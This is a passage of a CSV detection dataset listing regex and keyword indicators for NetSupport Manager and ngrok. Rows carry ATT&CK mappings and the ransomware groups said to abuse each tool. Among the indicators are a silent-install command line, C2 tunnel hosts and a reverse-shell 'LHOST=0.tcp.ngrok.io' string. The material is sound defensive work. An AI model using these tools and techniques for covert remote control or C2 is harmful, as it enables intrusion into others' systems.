Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\NetSupport*",".{0,1000}\\Start\sMenu\\Programs\\NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Win7Taskbar.dll*",".{0,1000}\\Win7Taskbar\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*_NetSupport_NetSupport Manager_*",".{0,1000}_NetSupport_NetSupport\sManager_.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*=NetSupport Client_deleteme*",".{0,1000}\=NetSupport\sClient_deleteme.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*>NetSupport Client Application</*",".{0,1000}\>NetSupport\sClient\sApplication\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>NETSUPPORT LTD.</*",".{0,1000}\>NETSUPPORT\sLTD\.\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>NetSupport Ltd</*",".{0,1000}\>NetSupport\sLtd\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>NetSupport Remote Control</*",".{0,1000}\>NetSupport\sRemote\sControl\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>NetSupport remote 
Control</*",".{0,1000}\>NetSupport\sremote\sControl\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*activate.netsupportsoftware.com*",".{0,1000}activate\.netsupportsoftware\.com.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Company'>NetSupport Ltd</*",".{0,1000}Company\'\>NetSupport\sLtd\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*geo.netsupportsoftware.com*",".{0,1000}geo\.netsupportsoftware\.com.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*HKCR\nsm\shell\open\command*",".{0,1000}HKCR\\nsm\\shell\\open\\command.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*HKCR\NSScriptFile\*",".{0,1000}HKCR\\NSScriptFile\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*HKLM\System\CurrentControlSet\Services\Client32*",".{0,1000}HKLM\\System\\CurrentControlSet\\Services\\Client32.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*https://nsproducts.azureedge.net/nsm-*/NetSupport*",".{0,1000}https\:\/\/nsproducts\.azureedge\.net\/nsm\-.{0,1000}\/NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport Audio Sample Source Filter*",".{0,1000}NetSupport\sAudio\sSample\sSource\sFilter.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*NetSupport Bitmap Source Filter*",".{0,1000}NetSupport\sBitmap\sSource\sFilter.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*NetSupport Manager -- Installation *",".{0,1000}NetSupport\sManager\s\-\-\sInstallation\s.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport Manager (1).msi*",".{0,1000}NetSupport\sManager\s\(1\)\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport Manager.msi*",".{0,1000}NetSupport\sManager\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport%20Manager.msi*",".{0,1000}NetSupport\%20Manager\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsupport*\PCISA.exe*",".{0,1000}netsupport.{0,1000}\\PCISA\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsupport*\runscrip.exe*",".{0,1000}netsupport.{0,1000}\\runscrip\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsupport*\supporttool.exe*",".{0,1000}netsupport.{0,1000}\\supporttool\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport_Client_machine.adml*",".{0,1000}NetSupport_Client_machine\.adml.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NetSupport_Control_Machine.adml*",".{0,1000}NetSupport_Control_Machine\.adml.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NSM_Control_Machine.adm*",".{0,1000}NSM_Control_Machine\.adm.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pcicfgui_client.exe*\Client32.ini*",".{0,1000}pcicfgui_client\.exe.{0,1000}\\Client32\.ini.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*program files*\netsupport\*",".{0,1000}program\sfiles.{0,1000}\\netsupport\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Client<*",".{0,1000}\'RuleName\'\>NetSupport\sClient\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Control<*",".{0,1000}\'RuleName\'\>NetSupport\sControl\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Deploy<*",".{0,1000}\'RuleName\'\>NetSupport\sDeploy\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Gateway<*",".{0,1000}\'RuleName\'\>NetSupport\sGateway\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Group Leader<*",".{0,1000}\'RuleName\'\>NetSupport\sGroup\sLeader\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Run Script<*",".{0,1000}\'RuleName\'\>NetSupport\sRun\sScript\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Script Editor<*",".{0,1000}\'RuleName\'\>NetSupport\sScript\sEditor\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Scripting Agent<*",".{0,1000}\'RuleName\'\>NetSupport\sScripting\sAgent\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Tech Console<*",".{0,1000}\'RuleName\'\>NetSupport\sTech\sConsole\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*'RuleName'>NetSupport Tutor<*",".{0,1000}\'RuleName\'\>NetSupport\sTutor\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote 
system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A" "*WindowsStoreAppExporter.exe*",".{0,1000}WindowsStoreAppExporter\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*winst64.exe* /q /q /ex /i*",".{0,1000}winst64\.exe.{0,1000}\s\/q\s\/q\s\/ex\s\/i.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.ngrok.me*",".{0,1000}\.ngrok\.me.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*/ngrok.exe*",".{0,1000}\/ngrok\.exe.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - 
","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*/ngrok.git*",".{0,1000}\/ngrok\.git.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*/ngrok.go*",".{0,1000}\/ngrok\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*/ngrok.log*",".{0,1000}\/ngrok\.log.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*/ngrokd.go*",".{0,1000}\/ngrokd\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" 
"*/ngrokroot.crt*",".{0,1000}\/ngrokroot\.crt.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*\ngrok.exe*",".{0,1000}\\ngrok\.exe.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*\ngrok.go*",".{0,1000}\\ngrok\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*\ngrok.log*",".{0,1000}\\ngrok\.log.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*\ngrokd.go*",".{0,1000}\\ngrokd\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - 
T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*6abfc342f0a659066c8b42999510ccc3592b499569c2e7af37470a445a2e3560*",".{0,1000}6abfc342f0a659066c8b42999510ccc3592b499569c2e7af37470a445a2e3560.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","#filehash","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*fe9dd722a085bce94fe2403f8d02e20becf0f0faa019d0789fadf35b66611a46*",".{0,1000}fe9dd722a085bce94fe2403f8d02e20becf0f0faa019d0789fadf35b66611a46.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","#filehash","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*http://*.ngrok.io*","http\:\/\/.{0,1000}\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" 
"*http://127.0.0.1:4040/api/tunnels*",".{0,1000}http\:\/\/127\.0\.0\.1\:4040\/api\/tunnels.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*https://*.ngrok.io*","https\:\/\/.{0,1000}\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*inconshreveable/ngrok*",".{0,1000}inconshreveable\/ngrok.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*LHOST=0.tcp.ngrok.io*",".{0,1000}LHOST\=0\.tcp\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*Mozilla/5.0 (compatible; 
ngrok)*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sngrok\).{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*ngrok tcp *",".{0,1000}ngrok\stcp\s.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*ngrok, Inc.*",".{0,1000}ngrok,\sInc\..{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 